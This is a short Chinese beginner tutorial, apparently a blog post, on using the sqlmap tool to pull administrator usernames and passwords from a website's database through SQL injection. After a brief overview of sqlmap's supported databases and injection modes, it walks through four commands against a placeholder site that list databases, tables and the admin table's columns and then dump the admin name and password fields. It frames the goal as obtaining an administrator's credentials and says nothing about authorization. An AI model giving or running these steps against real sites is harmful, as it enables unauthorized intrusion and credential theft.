利用sqlmap 获取管理员账号密码

首先，先简单介绍下sqlmap

简介：

sqlmap是一种开源的渗透测试工具，可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。

支持的数据库：MySQL，Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。

sqlmap支持五种不同的注入模式：

UNION query SQL injection（可联合查询注入
Error-based SQL injection（报错型注入）
Boolean-based blind SQL injection（布尔型注入）
Time-based blind SQL injection（基于时间延迟注入）
Stacked queries SQL injection（可多语句查询注入）

基本用法：
-u 使用sqlmap
--dbs 获取数据库名
--tables 获取表名
--columns 获取字段名

--dump 获取字段内容

实战：

1.获取库名  

python2 sqlmap.py -u "http://xxx.com" --dbs

成功获取库名

接下来得根据经验，猜他的账户，密码 在哪个库里，或者都进去看看也可以。

2.继续获取表名

python2 sqlmap.py -u "http://xxx.com" -D 库名 --tables

看见admin 看来离目标 不远了

3.获取字段名

python2 sqlmap.py -u "http://xxx.com" -D 库名 -T admin --columns

看到admin_name admin _pass  果然就在这

4.获取用户名，密码

python2 sqlmap.py -u "http://xxx.com" -D 库名 -T admin -C admin_name,admin_pass --dump

介绍完毕，小白教学，大佬勿喷，谢谢大家。